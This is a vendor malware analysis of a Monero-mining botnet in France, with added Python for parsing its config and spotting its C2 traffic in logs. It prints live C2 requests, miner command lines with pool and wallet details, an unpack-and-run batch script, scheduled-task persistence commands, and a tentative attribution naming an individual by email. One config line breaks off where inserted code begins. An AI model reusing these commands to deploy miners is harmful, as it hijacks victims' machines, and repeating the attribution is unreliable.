The 21st Century 49ers: Small-time cryptocurrency mining


Forcepoint™ Security Labs often identifies unusual or interesting pieces of malware. These can sometimes be part of larger, APT-driven campaigns (see our August 2016 report on the MOON campaign); at other times they are more niche, such as this small Monero mining botnet.

Similar to how the California Gold Rush lured amateurs with promises of easy money (the original “49ers”), cryptocurrency mining is attracting amateurs with its low barriers to entry. These 21st-century prospectors aren’t always following legal procedures: in January 2017, it was reported [1] that the Sundown exploit kit dropped a cryptocurrency miner based on open source code [2]. The sample was noted to contain no ‘tradecraft’, which was suggested to be indicative of a growing trend towards cybercrime by so-called novices.

A similar and arguably more successful campaign is underway in February 2017. It appears to affect a variety of machines in France, primarily associated with SMEs in the Haut-Rhin area, including:

  • several local government networks;
  • a garden equipment retailer;
  • architecture and construction firms;
  • a used car dealership.

Malware

The sample analysed (SHA1: 05a02703a19d798415aa98212cf0f7242ba9b4da) is a relatively unremarkable PE file. It connects to its primary C2 server for initial configuration.

  GET /misc/configv36.ini HTTP/1.1
  User-Agent: MyAgent
  Host: daterup1.ddns[.]net
  Cache-Control: no-cache

It appears that the malware uses the User-Agent string “MyAgent” throughout its communications.

The server returns the following unobfuscated file. Rather than following the INI convention of key=value pairs, the format places the data as a bare key under each of its many section headers.

  [VERSIONSERVEUR]
  4.04
  [NOMMAJ]
  AdobeServiceUpdate.exe
  [NOMUPDATE]
  IntelUpdate.exe
  [NOMMINER]
  java.exe
  [NOMMINERGPU]
  javaw2.exe
  [CHEMINMAJ]
  AdobeServiceUpdate
  [CHEMINUPDATE]
  IntelGraphics
  [CHEMINMINER]
  cryptonote
  [LISTESERVEURS]
  listeserveurs
  [SERVEURDOWNLOAD]
  hxxp://www.goepper[.]fr/misc/
  [SERVEURTEST]
  hxxp://daterup1.ddns[.]net/misc/
  [SERVEURACTIVITE]
  hxxp://daterup1.ddns[.]net/misc/
  [SERVEURSECOURS]
  hxxp://alurea[.]fr/misc/
  [COMMANDE32 DWARF]
  -dbg -1 -o stratum+tcp://xmr-eu.dwarfpool[.]com:8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p dateretupitsthat@gmail[.]com -t
  [COMMANDE64 DWARF]
  -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool[.]com:8005 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p dateretupitsthat@gmail[.]com -t
  [COMMANDE32 MINERGATE]
  -dbg -1 -o stratum+tcp://xdn-xmr.pool.minergate[.]com:45790 -u daterup@gmx[.]com -p x -t
  [COMMANDE64 MINERGATE]
  -a cryptonight -o stratum+tcp://xdn-xmr.pool.minergate[.]com:45790 -u daterup@gmx[.]com -p x -t
  [COMMANDE32 CRYPTO]
  -dbg -1 -o stratum+tcp://xmr.crypto-pool[.]fr:3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p x -t
  [COMMANDE64 CRYPTO]
  -a cryptonight -o stratum+tcp://xmr.crypto-pool[.]fr:3333 -u 44a5RFrtbjB5VUrFxDAQYR8Y2oj5wwUJGVMKutYFm6xFRCvRD2hUjAmWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm42tXD5V -p x -t
  [COMMANDE32]
  -dbg -1 -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com -p x -t
  [COMMANDE64]
  -a cryptonight -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com -p x -t
  [COMMANDE64YAM]
  -c 1 -M stratum+tcp://daterup%40gmx.com:[email protected][.]com:45590/fcn -t
  [COMMANDEGPU]
  javaw2.exe -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com:45590 -u daterup@gmx[.
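As an added example (not code from the original report), the following Python parser handles this “data as key” layout, which a standard INI parser would reject, and pulls out the stage/C2 URLs and stratum pool endpoints a defender would want to block or hunt for. The embedded sample config and the WALLET_PLACEHOLDER value are constructed to follow the page’s format, not captured from the bot.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the bot's layout: each [SECTION] header is followed by a
# bare data line instead of key=value pairs. Defanged as in the report.
SAMPLE_CONFIG = """[VERSIONSERVEUR]
4.04
[NOMMINER]
java.exe
[SERVEURDOWNLOAD]
hxxp://www.goepper[.]fr/misc/
[SERVEURSECOURS]
hxxp://alurea[.]fr/misc/
[COMMANDE64 DWARF]
-a cryptonight -o stratum+tcp://xmr-eu.dwarfpool[.]com:8005 -u WALLET_PLACEHOLDER -p x -t
[COMMANDE32]
-dbg -1 -o stratum+tcp://fcn-xmr.pool.minergate[.]com:45590 -u daterup@gmx[.]com -p x -t
"""

def refang(s):
    """Undo the report's [.] / hxxp defanging so the URLs can be parsed."""
    return s.replace("[.]", ".").replace("hxxp://", "http://")

def parse_bot_config(text):
    """Return {section: data} for the 'data as key' layout: the line after a
    [SECTION] header is the section's value, not a key=value pair."""
    config, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1)
            config.setdefault(section, "")
        elif section is not None:
            config[section] = line  # one bare data line per section
    return config

def extract_indicators(config):
    """Split the config into C2/stage URLs (SERVEUR* sections) and
    (host, port) stratum pool endpoints taken from the -o miner argument."""
    c2, pools = set(), set()
    for section, data in config.items():
        if section.startswith("SERVEUR"):
            c2.add(refang(data))
        elif section.startswith("COMMANDE"):
            m = re.search(r"-o\s+(stratum\+tcp://\S+)", data)
            if m:
                u = urlparse(refang(m.group(1)))
                pools.add((u.hostname, u.port))
    return sorted(c2), sorted(pools)
```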

The malware immediately requests instructions from the server.

  GET /misc/workers/commandes/<32/64>--- HTTP/1.1
  User-Agent: MyAgent
  Host: daterup1.ddns[.]net
  Cache-Control: no-cache

Our sandbox received a 404 response, most likely because the machine had not previously been infected. The malware then downloads two files from the predefined download server ([SERVEURDOWNLOAD]):

  • shortcut.lnk
  • filelist36.ini

The contents of filelist36.ini follow the same format as configv36.ini and are listed below. Interestingly, the section names in filelist36.ini appear to be in English rather than French.

  [ARCHIVEMINER32]
  archClaymore32.zip
  [ARCHIVEMINER64]
  archCryptonote64.zip
  [ARCHIVEMAJ32]
  maj32.36.zip
  [ARCHIVEMAJ64]
  maj64.36.zip
  [ARCHIVEUPDATE]
  update.36.zip
  [7ZA.EXE]
  7za.exe
  [7ZA.DLL]
  7za.dll
  [7ZXA.DLL]
  7zxa.dll

The contents of shortcut.lnk are more interesting, although it is not clear why it is included among the downloaded files. As can be seen below, it appears to be a shortcut to a copy of the malware under the IntelUpdate process name: the file is a properly formatted .lnk file that references the path C:\Users\Alex\AppData\Roaming\IntelGraphics\IntelUpdate.exe and the machine name alex-hp.

If 7-Zip is not present on the infected computer, the malware downloads the 7za files listed in filelist36.ini, then downloads update.36.zip and unpacks it using the command-line version of 7-Zip.

The archive password is simply ‘pass’:

  timeout 2
  cd "%APPDATA%\7z"
  7za e -ppass -y -w["%APPDATA%\cryptonote"] "%APPDATA%\update.36.zip" -o"%APPDATA%"
  del C:\Documents and Settings\user\Desktop\french.exe
  move "%APPDATA%\update.exe" C:\Documents and Settings\user\Desktop\french.exe
  timeout 2
  "C:\Documents and Settings\user\Desktop\french.exe"
  del "%APPDATA%\uscript_auto_maj.bat"

The malware then contacts the original C2 again at /misc/workers/allowupdate/<32/64>---, presumably to check whether to proceed with installing the update, before removing the previous versions of itself and setting up the new version as a new scheduled task:

  schtasks /Delete /tn "Microsoft Schelude Update" /F
  schtasks /Delete /tn "Microsoft Schelude Updater" /F
  schtasks /Delete /tn "Intel Service Update" /F
  schtasks /Delete /tn "Adobe Reader Update" /F
  schtasks /Delete /tn "update" /F
  schtasks /Delete /tn "Adobe Reader Updater" /F
  schtasks /create /sc MINUTE /MO 120 /tn "Intel Service Update" /tr "C:\Documents and Settings\user\Application Data\IntelGraphics\IntelUpdate.exe" /F /RL HIGHEST
  schtasks /create /sc MINUTE /MO 10 /tn "Adobe Reader Update" /tr "C:\Documents and Settings\user\Application Data\AdobeServiceUpdate\AdobeServiceUpdate.exe" /F /RL HIGHEST
  del "C:\Documents and Settings\user\Application Data\tskschl.bat" /F

Once up and running, the malware queries /misc/workers/commandes/<32/64>--- again for additional commands.
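The requests above share a fixed User-Agent and a small set of /misc/ paths, which is enough to flag this bot’s beaconing in web proxy logs. As an added example (not from the original report), this Python snippet runs that check over a few constructed proxy log lines in an assumed “timestamp src method host path user_agent” layout.

```python
import re

# Constructed proxy log lines (not captured traffic), one request per line:
# timestamp src_ip method host path user_agent
SAMPLE_LOGS = """2017-02-20T09:00:01Z 10.0.0.12 GET daterup1.ddns.net /misc/configv36.ini MyAgent
2017-02-20T09:00:02Z 10.0.0.12 GET daterup1.ddns.net /misc/workers/commandes/32--- MyAgent
2017-02-20T09:00:03Z 10.0.0.12 GET www.goepper.fr /misc/filelist36.ini MyAgent
2017-02-20T09:00:09Z 10.0.0.12 GET daterup1.ddns.net /misc/workers/allowupdate/32--- MyAgent
2017-02-20T09:01:00Z 10.0.0.40 GET www.example.com /index.html Mozilla/5.0
2017-02-20T09:02:00Z 10.0.0.41 GET intranet.local /misc/readme.txt Mozilla/5.0
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (.+)$")

# Staging and tasking paths documented for this bot (config, file list,
# command polling and update approval, each with a 32/64 architecture suffix).
C2_PATH_RE = re.compile(
    r"^/misc/(configv\d+\.ini|filelist\d+\.ini|workers/(commandes|allowupdate)/(32|64))"
)

def classify(line):
    """Return the reasons a single log line looks like this miner's C2 traffic
    (empty list when it does not match)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ts, _src, _method, _host, path, ua = m.groups()
    reasons = []
    if ua == "MyAgent":          # hard-coded UA used throughout the bot's traffic
        reasons.append("user-agent MyAgent")
    if C2_PATH_RE.match(path):   # a /misc/... path is only suspicious in this shape
        reasons.append("miner C2 path")
    return reasons

def detect(log_text):
    """Map each source IP to the distinct detection reasons it triggered, so a
    host that both carries the UA and polls the C2 paths stands out."""
    hits = {}
    for line in log_text.splitlines():
        reasons = classify(line)
        if reasons:
            src = line.split()[1]
            hits.setdefault(src, set()).update(reasons)
    return hits
```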


C2 servers

At the time of writing, daterup1.ddns[.]net resolved to the IP address 88.120.123.246, which is associated with OVH France. The primary interface appears to be an open directory, and it returns the bot control panel upon request (shown below).


Among the workers we also see a bot named alex-hp, matching the artifact found in the .lnk file:


This page provides information on the success rate and uptime of the current campaign. As of 20 February 2017, machines typically had up to five days of uptime. The victim addresses are all associated with French networks/ISPs and appear to belong to a mix of home users, small and large businesses, and local government agencies.

Another page lists the available commands for botnet owners, including the ability to launch Notepad from infected machines.


Many additional C2 or download servers could be found via the listeserveurs file. These servers are detailed below; many of them appear to be hosted on otherwise legitimate websites.


Although most of these servers are no longer in use, some still display a control panel listing inactive workers when probed, as shown below.


Below is a now-disused C2 whose uptime figures indicate that the campaign was active for at most six weeks. This is supported by the dates on which a number of historical samples were first collected, with one sample dating back to November 2016.


Rookie mistakes?

In the January miner case, the perpetrator had included references to his GitHub account within the code, a mistake that would prove fatal.

This actor appears to have learned from previous mistakes and practised good hygiene with regard to Git and the email addresses associated with user accounts on mining sites. The email address daterup@gmx[.]com appears to have been registered solely for this campaign.

While attribution can be difficult and is sometimes impossible to prove, there are still threads to follow in this campaign. At the time of writing, daterup1.ddns[.]net resolved to the IP address 88.120.123.246. This IP address is also listed as the resolved address for the domain blioman[.]ovh, which was retrieved from the listeserveurs file on February 20, 2017.


WHOIS data for the domain blioman[.]ovh records a registrant email of alexandre.thomassin@gmail[.]com, suggesting a possible association with the alex and alex-hp strings noted in the .lnk file and in the list of workers returned from the C2. The same name appears in the registration details of alurea[.]net (a sister domain to alurea[.]fr, which resolves to the same IP address) as alexandre.thomassin@mi-informatique[.]fr.

Though a weak association at best – especially given the legitimate nature of the other sites hosting C2 panels – a brief search suggests that a user named blioman has been active within a number of cryptocurrency communities including localbitcoins.com[3], dash.org[4], and moneroclub.com[5].

Conclusion

Monero miners have been seen in the wild before. The currency is new enough that ‘mining activity’ still yields a high return rate.

Several other factors add to the appeal of this cryptocurrency:

  • It was adopted by Oasis and AlphaBay, two of the most prominent deep-web marketplaces, in mid-2016.
  • It is more private than Bitcoin because its opaque blockchain greatly limits the traceability of the currency, eliminating the need to launder it before exchanging it for other currencies.
  • Its mining algorithm is memory-bound, which makes it better suited to mining on ordinary home computers than Bitcoin’s CPU-bound algorithm, which in turn favours specialised GPU-based mining machines.

Although this appears to be a simple case, it illustrates the low barrier to entry for cybercrime. Open source tools and well-documented procedures may tempt more people to “have a try”.

Statement of protection

Forcepoint™ customers are protected against this threat by TRITON® ACE at the following stages:

Stage 5 – Dropper File – Malware components cannot be downloaded or executed.

Stage 6 – Call Home – All HTTP-based C2 traffic has been blocked.

Indicators of Compromise

Samples (SHA1)

05a02703a19d798415aa98212cf0f7242ba9b4da
0bfdf18d27d8166c9eec82707574fff1bd37a5d2
49c02edf98dc537d7603b7bade39b58464e14fb0
e106e55fd377daa15151a113ad68c18cec7447c0
8ad17ff1cf0e356f8df6f04b19fa680064dc1b5a
d020ff5b82ff6809c132c176da80e6eab20b5458

C2 Domains

hxxp://altia-residences[.]com/misc
hxxp://alurea[.]fr/misc
hxxp://feuerstein[.]fr/misc
hxxp://goepper[.]fr/misc
hxxp://tiptop[.]fr/misc
hxxp://bmge[.]net/misc
hxxp://vivaldi-france[.]fr/misc
hxxp://blioman[.]ovh:8085/misc
hxxp://88.120.123[.]246:8085/misc
hxxp://daterup1.ddns[.]net/misc

Footnotes

[1] https://blog.malwarebytes.com/cybercrime/2017/01/the-curious-case-of-a-sundown-ek-variant-dropping-a-cryptocurrency-miner/

[2] https://github.com/tsiv/ccminer-cryptonight

[3] https://localbitcoins.com/accounts/profile/Blioman/

[4] https://www.dash.org/forum/members/blioman.3938/

[5] https://www.moneroclub.com/user/1067024038


source https://www.forcepoint.com/blog/x-labs/21st-century-49ers-small-time-cryptocurrency-mining
